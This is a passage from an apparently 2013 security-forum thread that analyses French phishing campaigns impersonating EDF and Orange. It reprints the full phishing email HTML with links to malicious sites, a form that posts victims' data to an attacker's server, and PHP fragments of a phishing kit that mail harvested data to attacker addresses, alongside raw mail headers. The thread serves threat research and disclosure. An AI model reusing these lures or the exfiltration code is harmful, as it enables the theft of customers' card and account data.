<span style="display:inline!important;word-spacing:0px;font:12px Arial,Helvetica,sans-serif;text-transform:none;color:rgb(0,0,0);text-indent:0px;white-space:normal;letter-spacing:normal"> Any omission when entering the requested information will result in the automatic rejection</span> <span style="display:inline!important;word-spacing:0px;font:12px Arial,Helvetica,sans-serif;text-transform:none;color:rgb(0,0,0);text-indent:0px;white-space:normal;letter-spacing:normal"> of your form and no refund of the sum of 58,80 Euro
Shells: http://www.kernelmode.info/forum/viewto ... =10#p17890
Attachments: 3 × infected (364.04 KiB, 1.99 KiB, 957.32 KiB)
 #17916  by Xylitol
 Mon Jan 28, 2013 4:00 pm
EDF phishing, not hosted on a hijacked server but a simple HTML form attached to the email;
the customer fills it in and the form is sent to the hacker's server.
<form class="form" name ="darnoo" id="darnoo" method="post"  onsubmit="return verif_formulaire()" action="http://dzwasqw.com/formax.php" 
https://www.virustotal.com/file/eee8377 ... 359388745/ > 145 (congrats Sophos)
Attachments: 1 × infected (76 KiB)
 #18023  by Xylitol
 Mon Feb 04, 2013 10:22 am
Time to dump the fucker again.
http://www.phishtank.com/phish_detail.p ... id=1720045
$send = "Ayoub.boos7@hotmai1.fr";
$subject = "EDF : $ip";
$from = "From: Tool4Spam.Com<Ayoub.boos7@hotmail.fr>";

mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from); 
Mail source:
x-store-info:fHNTDlzCF8Nxw6HwcfGQy+S7Ax/lqLSmNphQ3OF+T9E=
Authentication-Results: hotmail.com; spf=none (sender IP is 208.85.242.164) smtp.mailfrom=scnn999@server.24cc.info; dkim=none header.d=edfemails.com; x-hmca=none
X-SID-PRA: monagence@edfemails.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 5cuOr7VrmjDCKUdRtbxJSE0NRCeOoNFZQuXUhAQIR0MfBHEnKQaNS7feE3trgGYqzLytamkFF2P429z2Pyw4wwnhYgpCsFoQ9Kj1ZwU8j2UhGQZCYgkLGunzEHyxylLypUxfJ6zqXj9j1feSWrLcXFp5A0vuE2oA
Received: from server.24cc.info ([208.85.242.164]) by COL0-MC1-F29.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Sun, 3 Feb 2013 17:06:34 -0800
Received: from scnn999 by server.24cc.info with local (Exim 4.80)
	(envelope-from <scnn999@server.24cc.info>)
	id 1U2AW2-0008VN-0D
	for *****************@hotmail.fr; Mon, 04 Feb 2013 09:06:34 +0800
To: *****************@hotmail.fr
Subject: Avis Du 04/02/2013  [Notice of 04/02/2013]
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: EDF <monagence@edfemails.com>
Message-Id: <E1U2AW2-0008VN-0D@server.24cc.info>
Date: Mon, 04 Feb 2013 09:06:34 +0800
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.24cc.info
X-AntiAbuse: Original Domain - hotmail.fr
X-AntiAbuse: Originator/Caller UID/GID - [820 32008] / [47 12]
X-AntiAbuse: Sender Address Domain - server.24cc.info
X-Get-Message-Sender-Via: server.24cc.info: authenticated_id: scnn999/only user confirmed/virtual account not confirmed
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/scnn999/public_html/ayoubooxx.php 
X-Source-Dir: scnn999.com:/public_html
Return-Path: scnn999@server.24cc.info
X-OriginalArrivalTime: 04 Feb 2013 01:06:34.0818 (UTC) FILETIME=[E0505A20:01CE0273]

<HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD><TITLE>Demo</TITLE>
<STYLE type=text/css>
tr {font-family:Arial, Helvetica, sans-serif}
	td {border-collapse:collapse}
	p { padding: 0; margin: 0}
	ul, ol {margin: 0; padding: 0}
    a:link{text-decoration: none !important; border-bottom: none !important;
	background: none !important}
	.ReadMsgBody { width: 100%}
	.ExternalClass {width: 100%}
	div, p, a, li, td {-webkit-text-size-adjust:none;-ms-text-size-adjust:none}
    </STYLE>

</HEAD>
<BODY 
style="PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; PADDING-TOP: 0px">
<DIV>
<TABLE 
style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; WIDOWS: 2; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; MARGIN: 0px; PADDING-LEFT: 0px; BORDER-SPACING: 0px; LETTER-SPACING: normal; PADDING-RIGHT: 0px; DISPLAY: table; FONT: 12px Arial, Verdana, Helvetica, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; COLOR: rgb(68,68,68); BORDER-TOP: 0px; BORDER-RIGHT: 0px; WORD-SPACING: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px" 
border=0 cellSpacing=0 cellPadding=0>
  <TBODY 
  style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row-group; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
  <TR 
  style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
    <TD 
    style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">
      <TABLE 
      style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; BORDER-SPACING: 0px; PADDING-RIGHT: 0px; DISPLAY: table; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" 
      border=0 cellSpacing=0 cellPadding=0>
        <TBODY 
        style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row-group; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
        <TR 
        style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
          <TD 
          style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><A style="BACKGROUND-IMAGE: none; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; COLOR: rgb(0,158,225); FONT-SIZE: 11px; BORDER-TOP: 0px; FONT-WEIGHT: bold; BORDER-RIGHT: 0px; TEXT-DECORATION: ; PADDING-TOP: 0px; -webkit-text-size-adjust: none" href="http://bleuciel.edf.com" target="_blank"><IMG style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" border="0" alt="EDF" src="https://monagence.edf.fr/img_mails/logo_2.gif"></A></TD>
          <TD 
          style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><IMG style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" border="0" alt="" src="https://monagence.edf.fr/img_mails/bandeau_haut_2.jpg"></TD></TR></TBODY></TABLE></TD></TR>
  <TR 
  style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
    <TD 
    style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">
      <TABLE 
      style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; BORDER-SPACING: 0px; PADDING-RIGHT: 0px; DISPLAY: table; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" 
      border=0 cellSpacing=0 cellPadding=0>
        <TBODY 
        style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row-group; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
        <TR 
        style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
          <TD 
          style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none" 
          vAlign=top><IMG style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" border="0" alt="" src="https://monagence.edf.fr/img_mails/bandeau_gauche_1.jpg"></TD>
          <TD 
          style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 30px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none" 
          vAlign=top>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: bold; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">Cher 
            Client,</P><BR>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Dans 
            le cadre de nos mesures de sécurité, nous vérifions l'activité de 
            vos comptes afin de vous garantir un meilleur usage de nos 
            produits.</P>
            <DIV 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: auto; PADDING-RIGHT: 0px; DISPLAY: block; FLOAT: none; HEIGHT: auto; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Par 
            conséquent , Notre système a été obligé de bloquer temporairement 
            vos futurs paiements , en attendant une confirmation de cette carte 
            de votre part</P></DIV>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Veuillez 
            confirmez votre identité et rétablir l'accés à votre compte par ici 
            :</P>
            <DIV 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: auto; PADDING-RIGHT: 0px; DISPLAY: block; FLOAT: none; HEIGHT: auto; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none" 
            align=center><A style="BACKGROUND-IMAGE: none; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: Arial; COLOR: rgb(97,97,97); FONT-SIZE: 11px; BORDER-TOP: 0px; FONT-WEIGHT: bold; BORDER-RIGHT: 0px; TEXT-DECORATION: underline; PADDING-TOP: 0px; -webkit-text-size-adjust: none" href="http://www.razanco.ir" target="_blank"><BR><U 
            style="TEXT-DECORATION: underline">Accédez par ici</U></A></DIV>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Merci 
            Pour votre compréhension .</P>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Cordialement,</P>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Votre 
            conseiller EDF</P>
            <P 
            style="BORDER-BOTTOM: rgb(241,172,2) 2px dotted; TEXT-ALIGN: right; PADDING-BOTTOM: 5px; LINE-HEIGHT: 14px; BORDER-RIGHT-WIDTH: 0px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 11px; BORDER-TOP: rgb(241,172,2) 2px dotted; BORDER-LEFT-WIDTH: 0px; FONT-WEIGHT: normal; PADDING-TOP: 5px; -webkit-text-size-adjust: none">Retrouvez 
            tous vos services sur<SPAN 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" 
            class=Apple-converted-space> </SPAN><A style="BACKGROUND-IMAGE: none; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: Arial; COLOR: rgb(97,97,97); FONT-SIZE: 11px; BORDER-TOP: 0px; FONT-WEIGHT: bold; BORDER-RIGHT: 0px; TEXT-DECORATION: underline; PADDING-TOP: 0px; -webkit-text-size-adjust: none" href="https://monagence.edf.fr" target="_blank"><U 
            style="TEXT-DECORATION: underline">votre espace Client</U></A></P>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 12px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 10px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">ATTENTION 
            : Ce message est strictement confidentiel. Son intégrité n'est pas 
            assurée sur Internet. Si vous n'êtes pas destinataire du message, 
            merci de le détruire.<BR><BR>EDF SA au capital de 924 433 331 Euros, 
            RCS Paris n° 552 081 317, siège social 22-30 av de Wagram 75382 
            Paris cedex 08.<BR><BR>Copyright © EDF 2010</P>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 1.3em; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 600px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial, Verdana, Helvetica, sans-serif; FLOAT: none; HEIGHT: auto; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none" 
            align=center><IMG style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" border="0" alt="" src="https://monagence.edf.fr/img_mails/partie_bas.gif"></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
https://www.virustotal.com/url/07665ced ... 359973759/
Attachments
infected
(867.01 KiB) Downloaded 89 times
 #18119  by Xylitol
 Sat Feb 09, 2013 2:49 pm
Saturday phishing, same actor as http://www.kernelmode.info/forum/viewto ... 431#p18023
Phishing targeting Orange; the compromised server runs WordPress.
http://www.phishtank.com/phish_detail.p ... id=1724946
http://www.phishtank.com/phish_detail.p ... id=1724994
Mail source:
Code: Select all
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 199.204.248.102) smtp.mailfrom=p42907r6@cpanel02.myhostcenter.com; dkim=none header.d=orange.com; x-hmca=none
X-SID-PRA: monagence@orange.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0x
X-Message-Info: Q4vvGj5H5eUK+YJ6V2tGfomFWR4Pi5QuKn+mPIYzCuF4HkIHlPfY0dAOc1iGN4U6JEBQpCWUhETMdm9ShvttHSSHud44b1/LX21QgJIiBPLUHNehYy3rIx0WFhS8gvyWQWbcw3NvsFVlFl4E3HckMBEuocnEKN1D
Received: from cpanel02.myhostcenter.com ([199.204.248.102]) by SNT0-MC2-F18.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Thu, 7 Feb 2013 16:00:53 -0800
Received: from p42907r6 by cpanel02.myhostcenter.com with local (Exim 4.69)
	(envelope-from <p42907r6@cpanel02.myhostcenter.com>)
	id 1U3bOe-000FbN-GE
	for **************@hotmail.fr; Thu, 07 Feb 2013 19:00:52 -0500
To: **************@hotmail.fr
Subject: Remboursement avoir sur facture
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: Orange <monagence@orange.com>
Message-Id: <E1U3bOe-000FbN-GE@cpanel02.myhostcenter.com>
Date: Thu, 07 Feb 2013 19:00:52 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - cpanel02.myhostcenter.com
X-AntiAbuse: Original Domain - hotmail.fr
X-AntiAbuse: Originator/Caller UID/GID - [34135 32009] / [47 12]
X-AntiAbuse: Sender Address Domain - cpanel02.myhostcenter.com
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/p42907r6/public_html/Ayoubii.php 
X-Source-Dir: meridianliquidcoatings.com:/public_html
Return-Path: p42907r6@cpanel02.myhostcenter.com
X-OriginalArrivalTime: 08 Feb 2013 00:00:53.0238 (UTC) FILETIME=[5C99F960:01CE058F]

<HTML><HEAD>
</HEAD>
<BODY>
<TABLE style="WIDTH: 680px" border=0 cellSpacing=0 cellPadding=0>
  <TBODY>
  <TR>
    <TD>
      <P> </P></TD></TR>
  <TR>
    <TD><IMG alt="" src="http://consentement.eolas-services.com/doc/mail/v2/filet.gif" width="680" height="3"></TD></TR>
  <TR>
    <TD>
      <TABLE style="WIDTH: 745px; HEIGHT: 26px" border=0 cellSpacing=0 
      cellPadding=0>
        <TBODY>
        <TR>
          <TD bgColor=#f2f2f2 width=19><IMG alt="" src="http://consentement.eolas-services.com/doc/mail/v2/fleche.gif" width="18" height="13"></TD>
          <TD bgColor=#f2f2f2 width=543><SPAN class=Style13>Mon suivi de 
            remboursement</SPAN></TD></TR></TBODY></TABLE></TD></TR>
  <TR>
    <TD> </TD></TR>
  <TR>
    <TD>
      <TABLE 
      style="BORDER-BOTTOM: #ff6c0d 1px solid; BORDER-LEFT: #ff6c0d 1px solid; WIDTH: 680px; BORDER-TOP: #ff6c0d 1px solid; BORDER-RIGHT: #ff6c0d 1px solid" 
      border=0 cellSpacing=0 cellPadding=8>
        <TBODY>
        <TR>
          <TD align=center>
            <TABLE style="WIDTH: 723px; HEIGHT: 255px" border=0 cellSpacing=0 
            cellPadding=0>
              <TBODY>
              <TR>
                <TD class=Style5 width="82%" align=left>
                  <DIV><SPAN style="FONT-SIZE: 10pt">bonjour,</SPAN></DIV>
                  <DIV> </DIV>
                  <DIV><SPAN style="FONT-SIZE: 10pt">Vous êtes client d’une 
                  offre internet Orange et nous vous remercions de votre 
                  confiance. </SPAN></DIV>
                  <DIV> </DIV>
                  <DIV><SPAN style="FONT-SIZE: 10pt">En effet votre facture<SPAN 
                  style="COLOR: #ff6600"> N°</SPAN> <SPAN 
                  style="COLOR: #ff6600">139358537B0</SPAN> date d'émission 
                  <SPAN style="COLOR: #ff6600">07/02/2013</SPAN> à été 
                  doublement débite.</SPAN></DIV>
                  <DIV><SPAN 
                  style="COLOR: windowtext; FONT-SIZE: 10pt"></SPAN> </DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"><SPAN style="COLOR: #ff8040"><SPAN 
                  style="COLOR: #000000"></SPAN></SPAN></SPAN></SPAN> </DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"><SPAN style="COLOR: #ff8040"><SPAN 
                  style="COLOR: #000000">Suivi de <SPAN 
                  style="FONT-SIZE: small"><SPAN 
                  style="COLOR: #2c2c2d">v</SPAN><SPAN 
                  style="FONT-WEIGHT: bold">otre</SPAN> </SPAN>remboursement 
                  en ligne</SPAN></SPAN></SPAN></SPAN></DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"></SPAN></SPAN> </DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"><SPAN 
                  style="COLOR: #ff8040"> Directement en cliquant sur le 
                  lien suivant : <A style="TEXT-DECORATION: underline" title="Mon suivi de remboursement" href="http://www.alnafayfibers.com/NewOrange" rel="nofollow" target="_blank"><SPAN style="COLOR: #000000">Mon suivi de 
                  remboursement</SPAN></A></SPAN></SPAN></SPAN></DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"></SPAN></SPAN> </DIV>
                  <DIV><SPAN style="FONT-SIZE: 10pt">Désireux de vous 
                  satisfaire, nous vous remercions de votre 
                  fidélité.<BR><BR></SPAN><SPAN style="FONT-SIZE: 10pt">Merci de 
                  votre confiance</SPAN><BR><BR><SPAN 
                  style="FONT-SIZE: 10pt">Bien cordialement,</SPAN><BR><SPAN 
                  style="FONT-SIZE: 10pt">Votre service 
              clients</SPAN></DIV></TD></TR>
              <TR>
                <TD> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR>
  <TR>
    <TD><IMG alt="" src="http://consentement.eolas-services.com/doc/mail/v2/filet.gif" width="680" height="3"></TD></TR>
  <TR>
    <TD bgColor=#f2f2f2>
      <TABLE style="WIDTH: 100%" border=0 cellSpacing=0 cellPadding=8>
        <TBODY>
        <TR>
          <TD>
            <TABLE style="WIDTH: 100%" border=0 cellSpacing=0 cellPadding=0>
              <TBODY>
              <TR>
                <TD width="50%"> </TD>
                <TD width="50%" align=right><IMG alt="" src="http://ftorangefacture.net/far/mac1.gif"></TD></TR>
              <TR>
                <TD class=mentions colSpan=2> <SPAN class=ecxtext2><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 11px"><SPAN 
                  style="FONT-SIZE: small">France Télécom SA au capital de 10 
                  595 434 424 € - RCS Paris 380 129 866 
                  </SPAN></SPAN></SPAN><SPAN class=ecxtext2><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 11px"><SPAN 
                  style="FONT-SIZE: small">6, place d’Alleray 75505 Paris cedex 
                  15</SPAN></SPAN></SPAN></TD></TR>
              <TR>
                <TD class=Style2 colSpan=2><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 10px"><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 10px"><SPAN 
                  style="FONT-SIZE: x-small"></SPAN></SPAN></SPAN>
                  <P><SPAN style="FONT-SIZE: 10pt"><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 10px"><SPAN 
                  style="FONT-SIZE: x-small">Merci de ne pas répondre à ce 
                  courrier électronique. </SPAN></SPAN></SPAN><BR><BR><SPAN 
                  style="FONT-SIZE: 10pt"><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 10px"><SPAN 
                  style="FONT-SIZE: x-small">*3900 (service commercial) - temps 
                  d’attente gratuit, puis coût d’une communication locale ; 
                  depuis la ligne d’un autre opérateur, consulter ses 
                  tarifs</SPAN></SPAN></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<DIV id=_rc_sig> </DIV></BODY></HTML>
ghazalox.php:
Code: Select all
$send = "ayoub.boos7@gmail.com";

$subject = "BoOooOooOs Rezuult";
